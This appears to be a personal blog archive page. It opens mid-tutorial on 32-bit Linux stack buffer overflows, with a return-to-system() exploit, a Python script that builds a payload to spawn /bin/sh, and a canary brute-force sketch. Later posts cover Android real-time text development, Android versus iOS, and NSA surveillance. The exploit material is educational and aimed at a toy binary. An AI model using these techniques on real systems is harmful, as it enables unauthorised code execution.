We have to make sure the linker includes a reference to this function in our executable:

#include <stdlib.h>

void never_called() {
    system(NULL);
}

In this example, ASLR is disabled, so the address of the system() function will be very easy to find.

$ objdump -D buf_overflow_exec.out | grep 'system'
    08048390 <system@plt>:
    80484a8: e8 e3 fe ff ff call 8048390 <system@plt>

We need to return to 0x08048390 to call system(), which is easy enough, but we also need to set things up the way it expects. Under normal circumstances, when a function has just been called, %esp points to the return address the caller pushed, and the function’s arguments sit just above it on the stack. system() takes one argument, the command string to run. In our case, we want that to be another shell, i.e. “/bin/sh”. If you are writing this string out in a hex editor, you do not need to do anything differently for it to be written in little endian order; its natural representation is little endian, i.e. “ABCD” = 0x41 0x42 0x43 0x44.

We control the stack, so we can write this string there, and then we need to give a pointer to that location to system(). Our exploit will look something like this:

---------------------------------------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048390 | 0xAAAAAAAA | ptr to next byte | "/bin/sh\0" |
---------------------------------------------------------------------------------------
                                          ^ "%eip"     ^ system() arg     ^ pointee

When system() returns, the program will segfault, unless the page containing 0xAAAAAAAA just happens to be executable, in addition to actually existing. To avoid that, you can put a real address there, but it might still crash since the stack won’t be set up properly.

To find the pointer we need to pass to system(), run the exploit in gdb and see where “/bin/sh” ends up. You can set a breakpoint in main() and examine the stack. Or, you can find %ebp within main() and try to use an address relative to that. Something like:

$ gdb buf_overflow.out
break main
run some-file
p $ebp

If the exploit is structured correctly, the string will be at %ebp + 16 (i.e. %ebp + 0x10). For example, if %ebp within main() is 0xBFFFF318, set the pointer to 0xBFFFF328.

---------------------------------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048390 | 0xAAAAAAAA | 0xBFFFF328 | "/bin/sh\0" |
---------------------------------------------------------------------------------

Now you will return to system() and it will call /bin/sh for you.
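The whole file can again be generated with a few lines of Python (addresses as found above; 0xAAAAAAAA is the deliberately bogus return address for system()):

```python
import struct

# Sketch of the return-to-system() exploit file. 0x08048390 is system@plt
# from objdump, and 0xBFFFF328 is where gdb said "/bin/sh" would land
# (%ebp + 0x10); both are specific to this binary and this non-ASLR run.
payload  = b"\x90" * 500                  # padding up to the saved pointers
payload += struct.pack("<I", 0x90909090)  # saved %ebp slot
payload += struct.pack("<I", 0x08048390)  # "return" into system@plt
payload += struct.pack("<I", 0xAAAAAAAA)  # fake return address for system()
payload += struct.pack("<I", 0xBFFFF328)  # system()'s argument pointer
payload += b"/bin/sh\x00"                 # the string that pointer refers to

with open("exploit_libc", "wb") as f:
    f.write(payload)
```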


More than the sum of their parts

Unfortunately, the last two exploit techniques can’t easily be combined. My non-executable stack bypass relies on knowing the exact location of the “/bin/sh” string on the stack, so we can write a static pointer to it. The ASLR bypass relies on writing some code to the stack, which we execute. The procedure linkage table (PLT) is not usually randomized on Linux, so we can still call system() when ASLR is on, but it’s tough to give it the right argument. Perhaps if an executable happened to contain the string “/bin/sh” in a static location, we could pass that location to system() when ASLR is enabled; this seems pretty unlikely.

Therefore, these two defenses are reasonably effective in combination against this simple kind of attack. There are other attacks against ASLR, though, and more sophisticated return-oriented-programming (ROP) can still get around the non-executable stack. These bypass techniques are further than I’ve gone so far, but apparently they are pretty useful.

I have not yet gotten into heap buffer overflows, which are another class of bug that is apparently popular to exploit now. Regarding ROP and ASLR, I recently met David Williams-King, who is working on a new type of ASLR that uses a table of pointers that is constantly moved around, every few milliseconds, rather than simply randomizing the entire address space once. Perhaps this academic research will eventually find its way into the wild and make ROP even harder.


A bigger show stopper: the stack canary

An especially effective defense that I have so far avoided is the stack canary, stack cookie, or as gcc calls it, the stack-smashing protector (SSP). The canary is a random value written on the stack between any buffers and the saved pointers. When the function returns, it checks the canary location against the known value, and if it doesn’t match, this suggests that the return address has been smashed, so it quits. With the canary enabled, our stack frame would look like this:

0xFFFFFFFF
...
------------------------
| char ** argv         | <-- %ebp + 12
------------------------
| int argc             | <-- %ebp + 8
------------------------
| saved %eip           |
------------------------
| saved %ebp           | <-- %ebp
------------------------
| 4 random bytes       | <-- canary
------------------------
| ...                  |
| buf                  | <-- %ebp - 500 = %esp
------------------------
...
0x08040000

The canary-handling code is generated by the compiler, if you use the flag -fstack-protector, which is the default. If you disassemble main(), you’ll see the code that writes and then checks the canary:

0x080484fb <+0>: push %ebp
0x080484fc <+1>: mov %esp,%ebp
0x080484fe <+3>: and $0xfffffff0,%esp
0x08048501 <+6>: sub $0x220,%esp
0x08048507 <+12>: mov 0xc(%ebp),%eax
0x0804850a <+15>: mov %eax,0x1c(%esp)
0x0804850e <+19>: mov %gs:0x14,%eax
0x08048514 <+25>: mov %eax,0x21c(%esp)
0x0804851b <+32>: xor %eax,%eax
0x0804851d <+34>: cmpl $0x2,0x8(%ebp)
0x08048521 <+38>: je 0x804853c <main+65>
0x08048523 <+40>: mov $0x8048684,%eax
0x08048528 <+45>: mov %eax,(%esp)
0x0804852b <+48>: call 0x80483b0 <printf@plt>
0x08048530 <+53>: movl $0x1,(%esp)
0x08048537 <+60>: call 0x80483e0 <exit@plt>
0x0804853c <+65>: mov 0x1c(%esp),%eax
0x08048540 <+69>: add $0x4,%eax
0x08048543 <+72>: mov (%eax),%eax
0x08048545 <+74>: movl $0x0,0x4(%esp)
0x0804854d <+82>: mov %eax,(%esp)
0x08048550 <+85>: call 0x80483f0 <open@plt>
0x08048555 <+90>: mov %eax,0x24(%esp)
0x08048559 <+94>: movl $0x1f4,0x8(%esp)
0x08048561 <+102>: lea 0x28(%esp),%eax
0x08048565 <+106>: mov %eax,0x4(%esp)
0x08048569 <+110>: mov 0x24(%esp),%eax
0x0804856d <+114>: mov %eax,(%esp)
0x08048570 <+117>: call 0x80484cb
0x08048575 <+122>: mov $0x80486a6,%eax
0x0804857a <+127>: lea 0x28(%esp),%edx
0x0804857e <+131>: mov %edx,0x4(%esp)
0x08048582 <+135>: mov %eax,(%esp)
0x08048585 <+138>: call 0x80483b0 <printf@plt>
0x0804858a <+143>: mov $0x0,%eax
0x0804858f <+148>: mov 0x21c(%esp),%edx
0x08048596 <+155>: xor %gs:0x14,%edx
0x0804859d <+162>: je 0x80485a4 <main+169>
0x0804859f <+164>: call 0x80483c0 <__stack_chk_fail@plt>
0x080485a4 <+169>: leave
0x080485a5 <+170>: ret

So the canary value comes from gs:0x14, which is in the struct pthread thread descriptor (info, code). Once generated, it is a static value, so what we need to do is copy it from gs:0x14 back to %esp + 0x21C after smashing the original value. But copying that value requires code execution, which is exactly what we are trying to achieve. We’re stuck.

Previous versions of canary bypass have targeted locations besides the saved %eip, like other local pointers that happened to be above the buffer, or the function’s arguments. But the current SSP is smart enough to reorganize the stack frame such that all the buffers are near the top, all the locals are below them, and arguments are copied below the buffers before using them. Thanks IBM!

On Windows, the stack canary works via SEH, so if you can overwrite the exception handler, you might be able to get control that way (or you can cause an exception before the canary is checked, if you control the SEH record). A good resource on Windows defenses and bypasses is at Corelan.be.

Canary checking is more straightforward with Linux/gcc, though, so we don’t have an easy workaround. For a trickier attack, consider that the value is not reset if the process fork()s, as a server might do without calling exec(), so this might give you a chance to guess the same value repeatedly. On a 32-bit system, the value is brute forceable this way, but not every process fork()s, and few servers would still be 32 bit these days. This paper proposes a defense against the forking attack.
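The byte-at-a-time version of that guessing attack can be sketched as follows. This is hypothetical: it assumes an `oracle(payload)` callable that you would implement with a socket to the forking server, returning whether the child survived the canary check.

```python
# Sketch of the fork()-based canary brute force. Because fork() copies the
# canary, a crashed child doesn't change it, so we can guess one byte at a
# time: at most 4 * 256 = 1024 probes instead of 2**32. `oracle` is a
# hypothetical callable that sends the payload to the forking server and
# reports whether the child survived (i.e. the partial canary was right).
def guess_canary(oracle, buf_len=500, canary_len=4):
    canary = b""
    for _ in range(canary_len):
        for b in range(256):
            if oracle(b"A" * buf_len + canary + bytes([b])):
                canary += bytes([b])
                break
        else:
            raise RuntimeError("no byte survived; wrong buffer offset?")
    return canary
```

The fact that a wrong guess only crashes a disposable child, while the parent keeps the same canary, is exactly what makes the non-exec()ing forking server dangerous here.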

There is still some remote chance of corrupted data if there are multiple buffers in the stack frame, and the higher one stores pointers or some other exploitable data, and the lower one can overflow into it. You may be able to make other parts of the program misbehave by manipulating this data. But that’s not the case in our simple example. You might find this more useful in C++ objects, which contain function pointers, and may be on the stack! To dig deeper here, heap overflows and use-after-free bugs on the heap generally target C++ objects and their function pointers, but this is a whole other topic.

I heard a talk by Mudge at Summercon this weekend where he stressed that “we have to get beyond controlling the instruction pointer”; that is, a lot of critical systems can be disrupted without executing your own code. Think of industrial systems or infrastructure: you don’t need to run malware on the power grid, you just need to crash the program to turn the lights off. His example was an oil drilling rig: if the drill stops, the molten earth solidifies around it, knocking it offline for at least a year. Defense systems are another example where denial-of-service is nearly as bad as code execution (which can, itself, of course cause DOS). The stack canary is no use in these cases; the buffer overflow still happens and causes the program to crash.

In the case of your PC or server, though, where crashing is not that terrible, the stack canary is a pretty good defense. I haven’t read of any techniques to reliably rewrite the canary value in all cases, i.e. cases where you can’t fork(). If that changes, I’ll update this.


Putting it all together

Here are some good walkthroughs on how to bypass these defenses in practice, in a situation where it is in fact possible (e.g. server process that calls fork(), and the ability to call usleep() to learn the base address of libc).

Real-time text development notes 2

Wednesday, March 9th, 2016

When I started actually trying to use Omnitor’s t.140 library to receive some real-time text in my Android app, it seemed like it would be a breeze. They provided a helpful little example program with some extra classes that make it look very easy to use. Nice.

Their library is kind of old, so it is a plugin for the Java Media Framework, which is very old (its website is excited to announce support for MP3!), and plenty of people warn against trying to use JMF on Android. But the cross-platform jar is still available, and it seemed worth a try. Even if it’s not built into the JRE in Android, hopefully we can still use the external jar. However, one problem arose: one of the classes that Omnitor provides implements the javax.media.BufferControl interface, which contains this method:

public Component getControlComponent() {
    return null;
}

This is supposed to return a java.awt.Component, but Android doesn’t include this. When people say that “Android doesn’t use Java”, this is what they mean. It is perfectly logical that Android has a different UI layer instead of the desktop windowing stuff. So this doesn’t compile.

But wait, we don’t actually need to do anything window-related here. No one is actually going to use anything this method returns. It returns null, so there’s no way that the object we’re returning actually HAS to provide the functionality of a Component. OK, maybe we can get around this by creating a little placeholder file to silence the compiler:

package java.awt;

public class Component {

}

Upon trying this, I received the best compiler error I have ever encountered:

Ill-advised or mistaken usage of a core class (java.* or javax.*)
when not building a core library.

This is often due to inadvertently including a core library file
in your application's project, when using an IDE (such as
Eclipse). If you are sure you're not intentionally defining a
core class, then this is the most likely explanation of what's
going on.

However, you might actually be trying to define a class in a core
namespace, the source of which you may have taken, for example,
from a non-Android virtual machine project. This will most
assuredly not work. At a minimum, it jeopardizes the
compatibility of your app with future versions of the platform.
It is also often of questionable legality.

If you really intend to build a core library -- which is only
appropriate as part of creating a full virtual machine
distribution, as opposed to compiling an application -- then use
the "--core-library" option to suppress this error message.

If you go ahead and use "--core-library" but are in fact
building an application, then be forewarned that your application
will still fail to build or run, at some point. Please be
prepared for angry customers who find, for example, that your
application ceases to function once they upgrade their operating
system. You will be to blame for this problem.

If you are legitimately using some code that happens to be in a
core package, then the easiest safe alternative you have is to
repackage that code. That is, move the classes in question into
your own package namespace. This means that they will never be in
conflict with core system classes. JarJar is a tool that may help
you in this endeavor. If you find that you cannot do this, then
that is an indication that the path you are on will ultimately
lead to pain, suffering, grief, and lamentation.

This is amazing. It clearly describes the problem, offers understandable suggestions as to the possible causes, provides detailed information about how to fix them, and offers some useful advice/context. This is why programmers need to be good at writing human languages and dealing with people.

The warning here is pretty clear for my case: don’t use JMF, it depends on stuff that isn’t in Android. My situation is definitely what the message is talking about re: grief and lamentation. But…I’m not about to rewrite Omnitor’s whole library. Modifying it not to use JMF sounds pretty hairy. Maybe there’s a way to get past this. How about if we use the actual original version of java.awt.Component? That’s in rt.jar, which comes with your JVM, so we can unzip it and find Component.class, and put that in its own jar. No luck, same error, we’re still trying to use the java.awt package within our project. Maybe try the whole rt.jar? Same problem. Isn’t there some way around this?!

Well, there’s that --core-library option. In Android Studio 1.5, this is found in File > Other Settings > Default Settings > Build, Execution, Deployment > Compiler > Android Compilers. Wow, that’s pretty buried. They sure don’t want me to use this. In fact, if I try to use it, nothing happens. Some Stack Overflow posts discuss this flag and how to add it, one of which is similar to an Android bugtracker post that basically says don’t do this. One comment says this no longer works on Android Studio 1.2, which is older than my version. In my great searching, I came upon a mailing list discussion that apparently led to the fantastic error message, but no real help. I am inclined to think that this may now be intentionally disabled, but the vestigial checkbox remains. Shucks.

Let’s back up. The problem is that we need to return a “Component” but the compiler doesn’t know of any such class. If only this interface called for returning something else…aha! Since we are using JMF in a jar file, not as part of the actual JRE, let’s modify that jar. This involves decompiling it, which is no problem in Android Studio (IntelliJ). I decompiled Control.class, copied the source to a new project, and changed
public Component getControlComponent()
to
public Object getControlComponent()
This is sketchy, I know. There is all sorts of risk that other things that use this interface could break. But as far as I know, I’m not using anything else that uses this interface. I just want to use this one little class from Omnitor’s example! So, I unzipped the jar, compiled a new Control.class, replaced the existing .class and repackaged the jar with:
$: jar cf new_jmf.jar *
Plop that into my app as a library, and what do we get?
bad class file magic (cafebabe) or version (0034.0000)
Hm. Dang. Something is wrong with my jar. Looking at the jar in a hex editor, I see that indeed my magic number is CAFEBABE 00000034, so what’s so bad about that? It was produced by the official jar tool, so it seems legit. Isn’t this exactly what that error message expects? Posts online suggested that it had to do with the Java version of your project. I’m using 1.8, so I downloaded the official Oracle JDK 1.7 and set Android Studio to use that for compiling this project. No change. Luckily someone else spent even longer than I did on this and figured out that what this message is expressing (very badly) is that the Java version the jar was compiled with is too new, since Android only supports 1.7. Fine, I recompiled my modified Control.class again using 1.7, repackaged the jar again, and…it worked! Wow!

Now, simply managing to compile something is not a very big victory. Does the app actually work? I called it from SIPCon1 and sent some text, just trying to write it to the log. Nothing there, except some errors:

03-09 13:47:07.537 8307-8365/com.laserscorpion.rttapp W/System.err: IOException in readRegistry: java.io.InvalidClassException: javax.media.protocol.ContentDescriptor; Incompatible class (SUID): javax.media.protocol.ContentDescriptor: static final long serialVersionUID =-7089681508386434374L; but expected javax.media.protocol.ContentDescriptor: static final long serialVersionUID =912677801388338546L;
03-09 13:47:07.538 8307-8365/com.laserscorpion.rttapp W/System.err: Could not commit protocolPrefixList
03-09 13:47:07.538 8307-8365/com.laserscorpion.rttapp W/System.err: Could not commit contentPrefixList
03-09 13:47:07.540 8307-8365/com.laserscorpion.rttapp I/System.out: No plugins found
03-09 13:47:07.542 8307-8365/com.laserscorpion.rttapp W/System.err: java.lang.reflect.InvocationTargetException
03-09 13:47:07.543 8307-8365/com.laserscorpion.rttapp W/System.err: java.lang.reflect.InvocationTargetException
03-09 13:47:07.544 8307-8365/com.laserscorpion.rttapp W/System.err: java.lang.reflect.InvocationTargetException
03-09 13:47:07.553 8307-8365/com.laserscorpion.rttapp W/System.err: Failed to open log file.
03-09 13:47:07.562 8307-8365/com.laserscorpion.rttapp I/art: Rejecting re-init on previously-failed class java.lang.Class
03-09 13:47:07.562 8307-8365/com.laserscorpion.rttapp I/art: Rejecting re-init on previously-failed class java.lang.Class
03-09 13:47:07.562 8307-8365/com.laserscorpion.rttapp I/art: Rejecting re-init on previously-failed class java.lang.Class
03-09 13:47:07.562 8307-8365/com.laserscorpion.rttapp I/art: Rejecting re-init on previously-failed class java.lang.Class

A series of errors that seems to stem from a failed serialization. It looks like in making changes to jmf.jar, I confused some class about what is what. Something is unsure if the ContentDescriptor in my jmf.jar is the correct ContentDescriptor that it needs, because the serialVersionUID is wrong. This isn’t surprising, since it seems ContentDescriptor doesn’t define an explicit serialVersionUID. The only way around it is to trick the JRE into thinking the new jar is the old one. OK, let’s define what it wants and remake the jar again:

static final long serialVersionUID = 912677801388338546L;

Same problem. Apparently Proguard may mess up your serialVersionUIDs on Android. You can add some options in a Proguard config file (proguard-rules.pro, not proguard.cfg, that’s out of date) to stop this. But this still didn’t help. I got the exact same message, which was strange, because I had changed the value. After banging my head against it for a while, I realized the error message is ambiguous; it didn’t exactly say who expected which value. It found -7089681508386434374L but expected 912677801388338546L, but where did it find and expect those? I still don’t really know, but I don’t care either, because using the other value in my recompiled jar worked:

static final long serialVersionUID =-7089681508386434374L;

Phew, that error went away. But…the rest didn’t. This was not the cause of the entire cascade. JMF is still just not working.

This is unsurprising. I was basically warned. I’m firmly in grief and lamentation land, and I knew it was coming. Android is not Java. This old and crusty JMF thing is kind of part of the Java™ platform, but is really not something you can expect to work on Android, which just uses the Java syntax, and a few convenient parts of the Platform™. Some things, like JAIN SIP, use stuff that is basic enough that it’s not hard to make it work on Android. This “media” framework does not. Sigh.

Well, what now? Omnitor’s library depends on this. Android doesn’t even offer a bare RTP framework we can use, since what it has only does audio. This is not great. Time to take stock of my plan.

Real-time text development notes 1

Sunday, March 6th, 2016

As a school project, I’m working on an Android real-time text (RFC 4103) app using the NIST JAIN SIP builds for Android. My professor pointed out that all the problems I was having are probably going to trip up somebody else later, so I should document them. So, internet, here is your first installment of problems I’ve faced that you hopefully won’t. I’m a number of weeks into this project already, so I’ll need to go back and write up everything I’ve already solved. Using JAIN SIP on Android certainly involves some contortions that don’t come up in standard JAIN tutorials.


AsteriskNOW is a handy all-inclusive open-source PBX package (SIP/RTP server). Install it in a VM and you instantly have a SIP server, not too much configuration required. The configuration you do have to do has a bit of a learning curve because it is so full-featured, but overall it seems pretty nice. The help tooltips of the many, many configuration options in the FreePBX web interface leave something to be desired, but I got a couple users working before too long (hint: most of what you need is under Applications > Extensions, and you will want to consult Reports > Asterisk Logfiles > fail2ban to see logging of REGISTER attempts).

Because Omnitor’s RTT reference implementation SIPCon1 doesn’t seem to understand 401 responses and digest authentication, it has trouble registering with a modern server. If there’s a way to force Basic authentication in Asterisk, I haven’t found it. A useful Stack Overflow post by one of the Asterisk developers, Olle E. Johansson, indicated that leaving the “secret” for an extension blank disables authentication entirely for that user, so that works to get SIPCon1 talking to Asterisk.

However, another problem with Asterisk stems from the fact that it is a back-to-back UA. Thanks to Omnitor and Olle E. Johansson (who apparently also happens to be from Sweden), Asterisk can speak T.140 (RFC 4103) in its role as a B2BUA, but a surely unintentional hearing bias shows through its design. As Gunnar Hellström pointed out on the development mailing list in May 2014, Asterisk will immediately drop any call that does not include a negotiated audio stream. I encountered this same issue myself this week when trying to offer a text-only session to SIPCon1 from my own app. Not having used SDP before, it took me a little while to get JAIN SDP to cooperate (more on that later), but eventually I did:

INVITE sip:[email protected] SIP/2.0
Call-ID: [email protected]
CSeq: 1 INVITE
From: <sip:[email protected]>;tag=-1455828934
To: <sip:[email protected]>
Via: SIP/2.0/UDP 192.168.1.103:5060;branch=z9hG4bK-323734-97510ab0f8dfe28e37a44d62bc8a144c
Max-Forwards: 70
Allow: ACK, BYE, INVITE, OPTIONS, CANCEL
Contact: <sip:[email protected]:5060>
Expires: 30
Content-Type: application/sdp
Content-Length: 154

v=0
o=201 2122197558 1 IN IP4 192.168.1.103
s=RTT_SDP_v0.1
c=IN IP4 192.168.1.103
t=0 0
m=text 5061 RTP/AVP 100
a=rtpmap:100 t140/1000
a=sendrecv

I think this should be fine. I should also support t140 red, but I’ll worry about that later. I’m pretty sure SIPCon1 would accept this. But Asterisk never gives it the chance, because it assumes every call must have audio. It’s strange that it accepts the call and only then sends an immediate BYE, rather than simply responding 488 Not Acceptable. I think RFC 3261 says that when the original offer is sent with the 200 OK, and the offer is not acceptable, the caller should still send the ACK and then send an immediate BYE, which is similar to what is happening here, but not quite. If Asterisk doesn’t want to accept my text-only session, it should tell me so with 488. Whatever. Luckily Gunnar’s email helped me understand that I’m not crazy and my SDP actually was working correctly.

So Asterisk is out. Instead I tried sipXcom, which is a regular proxy. It’s pretty good so far, but is not without its own problems. Using VMWare Fusion 8.1, I got it running fairly quickly, faster than Asterisk, but ran into some quirks. It basically assumes you are using hardware phones, and when setting up a new extension, the only way around this is to say your new phone is “Jitsi”. In fact I have been using Jitsi for testing INVITEs, but to claim that all softphones must be Jitsi is a little silly. Anyway, a bigger problem is that after suspending and restoring the VM, all attempts to register got an immediate 408 Request Timeout. How could you issue 408 immediately? My Expires: header was 600, and the only 600 that could have passed in that time was maybe 600 microseconds. Rebooting fixed it.

The final problem with sipXcom for my purposes is that it doesn’t allow you to leave a user’s password blank, or otherwise disable authentication. This is a totally sensible security feature, but in this rare case, I actually do want the freedom to do this. Or at least, I’d like to use Basic authentication instead, since SIPCon1 can probably manage that. It might be possible to do at least one of these by editing a configuration file, but the web interface doesn’t seem to give an easy way. I’ll look into that later. For now I can call my app from SIPCon1, with SIPCon1 still connected to Asterisk and my app going through sipXcom.

Why I use and hate Android

Friday, November 6th, 2015

I was lucky enough to be gifted an original iPhone within the first year of them being available. I thought it was amazing, because it was (and let’s be honest, basically still is). But when it started physically wearing out, I ended up buying an Android phone, and have used Android since.

My reasoning was that Android is more like a “real” computer operating system. It exposed true multitasking to the programmer, so I as a user could run any combination of arbitrary applications at once. And you can install apps from whatever app store you want, or manually without any store in the way at all. Plus it’s open source(ish)! As someone who is now studying computer science, these kinds of things seemed important. Clearly Android is not as polished as iOS, but I came to understand why people used Windows in the 90s, or desktop Linux today; I figured that as a technical person I could handle the rough edges, no problem.

As my current Android phone is now also wearing out, it’s about time to get a new one, unfortunately. There’s a top-of-the-line Android model I’ve got my eye on that offers great specs and a much lower price than even an older generation iPhone. But after using the Windows 95 of smartphones for a few years, I have also come to remember why the shrinking number of Mac and Amiga users could remain so smug in the 90s: like Windows before it, Android kind of sucks.

If you had shown me my current broken phone 20 years ago, I would have flipped my shit at this Star Trek technology that was soon to become available to me. It’s an unbelievable future supercomputer, in your pocket! But…our standards have changed in 20 years. Even compared to my 7-year-old dual-core laptop that is also barely hanging in there, this phone is really not very powerful. I wanted my phone to act like a “real” computer, and it turns out that I expect a real computer to do a lot more than I did 20 years ago. We take bulletproof multitasking for granted now, with modern Windows descended (sort of) from VMS, modern Macs descended from BSD/Mach, and modern Linux desktops even being somewhat usable.

But now that I’m studying operating systems and have thought more about the interaction between hardware and software, I can tell you that some fundamental things have not changed: one CPU core can run one task at a time, main memory is slower than caches and registers, hitting the disk is painful, and switching between tasks is not some free magic with no overhead. The fact that your desktop/laptop computer appears to seamlessly and effortlessly run many flashy user applications at a time is a complete illusion made possible by the fact that PC hardware is really powerful now; it is actually running one thing at a time and switching between all of them hundreds of times a second so you don’t notice.

And here’s where Android kind of sucks. It does “real” multitasking all right, but you sure can’t take it for granted. Mobile CPUs use less power partly because they are just slower; phones (until recently) didn’t have anywhere near as much RAM as PCs; and even though smartphones use flash storage, it’s not exactly your desktop SSD in terms of performance. This is how you get situations where Android appears to slow to a crawl or freeze entirely for embarrassingly long periods (a couple seconds for a new phone, up to minutes for my old one).

Mobile RAM is slow enough as it is, and having to frequently swap in and out to a slow disk is really bad news. iOS was designed not to swap at all (I haven’t kept up with it so I don’t know if that’s still the case). Not running as many tasks at once means you move stuff in and out of RAM less often, your cache probably stays hotter, and you waste fewer CPU cycles context switching between user and kernel space and switching between tasks. As of a few years ago (and maybe still?), mobile hardware was legitimately not ready to do this kind of stuff, and iOS probably made the right choice in limiting user-level multitasking to a few specific things that are handled through tightly controlled OS services (obviously there are tons of invisible tasks actually running on both Android and iOS).

As it has for the last five decades, the semiconductor industry is charging ahead, delivering literally exponential progress in speed and capacity. Phones and tablets are getting more powerful. The Android phone I’m considering has more RAM than some laptops. So, is this problem solved? Well, I thought it was last time I bought a phone, and here we are now. As these things improve, we expect our devices to do more and more, and that new phone still doesn’t have as much RAM as my particular laptop, and its four cores still probably aren’t as powerful as the laptop’s two. The phone probably works pretty well straight out of the box, but I wonder how long it will stay that way.

In response to this new hardware situation, what has iOS done? Oh, they recently added the ability to run exactly two apps side by side. That…seems like a pretty good number. So the question is, is it worth paying more to do less? As a student, I’m probably not actually going to buy anything for a while, and Android sure is cheaper. I do still like the idea of being able to mess with it, and I’m becoming more able to do that now. But that’s just me – whenever anybody asks, I tell them to get an iPhone.

Why I am worried about the NSA

Monday, June 1st, 2015

People who know me will be aware that one of the main things I’ve been thinking about since June 2013 is the NSA, and surveillance in general.

This is, of course, not the case for most of those people themselves, so it is not immediately obvious to many of them why I have been spending so much of my time thinking about this. So in hopes of laying the foundation for people to understand why I care, here is my attempt at putting together all the pieces of this issue as I see them. I don’t expect to convince anyone of anything they didn’t already want to believe, but I would like people I know to understand my thinking (cue internet crazies showing up in 3, 2, 1…). It seems that a worrisome number of people I have talked to are genuinely not aware of the history and current events that make me think that this matters.

This post is sort of long, but it originally included a few thousand more words on what exactly the NSA is doing, so I’ll spare you that for now. This is not an issue that I think should be boiled down to sound bites or discussed only in the abstract without examples, so I’ve tried to provide further reading in the inline hyperlinks. If you have enough interest in my thoughts to even be here in the first place, I hope you will stick with me to get the whole picture. You’re free to disagree about any of my conclusions, but hopefully you will at least see where I’m coming from and not dismiss me as a total conspiracy theorist (though I’m willing to hold down that corner if I have to).

Note that I may use the NSA and FBI interchangeably at points, because despite their vague assurances, I don’t believe there is really anything keeping them from secretly sharing everything with each other. When I interned at the Department of Homeland Security in college (a youthful indiscretion), I worked on a report that laid out the vision for how this would seamlessly work across agencies. We have evidence that this is now happening, so let’s go ahead and conflate the two. Update 6/24/2015: we have now learned that the FBI has access to the NSA’s cable taps, which means my assumption was right. </update>


I have heard from some of my friends who don’t think all this surveillance stuff is a big deal. Paraphrasing a couple reactions that come to mind:

  • “I don’t have anything to hide. Google and Facebook know everything I do anyway.”
  • “Isn’t this a pretty privileged thing to care about? You and your Burner friends are worried about getting in trouble for stuff you’re emailing about, but way more brown people are being screwed by the regular cops on the street every day.”
  • “Didn’t we already know they were doing this? Same old, same old.”

From where I’m sitting, these attitudes completely miss the point. I’m not worried about my own safety at all. I’m only partially offended about my own privacy being violated. This isn’t about what I personally am reading or talking about online. The problem, as I see it, is that the activities of the NSA and FBI are fundamentally incompatible with a free and democratic society.

In fact, I’m not even that concerned with them spying on most people. The scale of what they are doing is problematic, but the person who “doesn’t have anything to hide” is at least partially right: most people truly are totally uninteresting to the authorities, myself hopefully included (though the fact that most of us have curtains on our windows means that we surely must have something to hide from somebody).

This isn’t about you or me. As Edward Snowden himself put it, “Arguing that you don’t care about the right to privacy because you have nothing to hide is no different than saying you don’t care about free speech because you have nothing to say.” And you know what? Some people do have legitimate things to hide. Some people don’t (or wouldn’t today) post everything on Facebook. Some people are very interesting. And some of those people have gone on to become the most important and respected figures in our history.

Martin Luther King Jr. and Malcolm X were both subjected to heavy FBI interference. The full toolkit of 1960s-era surveillance was thrown at them, from telephoto lenses to tapped phones and secret informants. This was overt enough that they knew about it. It was no surprise to them that the power structure had no interest in their upending it, and this was just one of the many enemies they faced, from white racists to jilted members of the Nation of Islam. But it was a special kind of enemy: this was the state actively trying to disrupt peaceful political activity, to preserve its own power. These two leaders, whom we now venerate so highly, were the target of some third-world secret police shit, right here in the “center of the free world”, some of it under that same guise of “national security”.

The FBI had to expend physical human resources on this activity. An actual person had to listen to their calls, follow them around, sort through photos of them and figure out who’s who. You can’t do that to everyone, or even very many people. It was hard work to gather enough information for the letter the FBI sent to Dr. King telling him to kill himself. It was probably just as hard to gather and selectively edit the private conversations they sent to his wife to try to break up his marriage.

This isn’t hard any more. They have already done it, to everyone. They haven’t put all the pieces together, and they haven’t sent the letter yet, but they’re prepared to. GCHQ, the NSA’s psychotic little brother across the pond, is at the forefront of infiltrating and discrediting political and activist groups online, and it feels pretty dangerous to assume that the NSA and FBI would never get up to their old tricks again. (GCHQ also lumps investigative journalists in with terrorists, and I hope I don’t need to say anything else about that.)

They only went after black leaders once they had risen in stature and had substantial followings, but the agencies are ready out in front this time. They’ve already got everything they need on the next up-and-coming leader, whoever that may be. Even local police have access to commercial software that will analyze social media for “any comments that could be construed as offensive” to assign a “threat rating” to individuals that officers are investigating, so we can hardly even imagine what the FBI and NSA can do.

They know who has attended the Black Lives Matter protests. They can see who in that movement is making noise on Facebook, and if those people decide to continue the discussion in “private”, they can likely read that too. The next Malcolm X may be building up their Twitter followers now, and they may not get much further if the intelligence agencies don’t want them to. Some leaders have emerged, and I’m afraid that they are probably too busy to keep themselves very safe online. This tweet and a follow-up Anonymous video claim to show the Department of Homeland Security tapping the phones of decidedly peaceful demonstrators in Chicago. Did they follow up with the NSA afterward? Update 9/23/2015: a “social media security” company apparently classified those leaders I mentioned as “Threat type: PHYSICAL, Severity: HIGH”, which is ridiculous. Not very happy to say that I was right, but well, look at that, someone is scared of them. </update>

I hope you can see now that it’s not me that I’m worried about, it’s our system, which is supposed to be among the freest in the world. I don’t think the leader of the free world should be wiretapping peaceful protestors. We’re no longer in any position to lecture China on human rights. It doesn’t look to me like the system is that much more tolerant of troublemakers now than it was during my parents’ time, so I don’t think we need to be handing it any more tools of oppression (speaking of my parents, I’ll briefly point out that the FBI went after white kids not unlike them in the 60s, too).

In high-school civics class, they taught me that democracy is “majority rule, with protection of minority rights”. Well, right now the majority, through its various three-letter agencies, is in a better position than ever before to control exactly which minorities get to exercise their first amendment rights, and I don’t have a lot of faith that it’s going to wield that power any more wisely than it did 50 years ago. The NYPD’s attitude toward Muslims in New York City certainly doesn’t seem very enlightened. Some of those people are really giving the rest of us a lesson on what we are in for. I can point to a local case, too: I have spoken to one (totally sane) police accountability organizer in SF who has good reason to suspect that their communications have come under surveillance by the city in the last year (sorry I can’t be more specific while respecting their privacy). This person has been individually targeted after they were identified; if their adversary were the federal government instead of the city, the NSA would already have quite a file on them. Luckily this person is brave enough to keep going, but who knows about the next one.

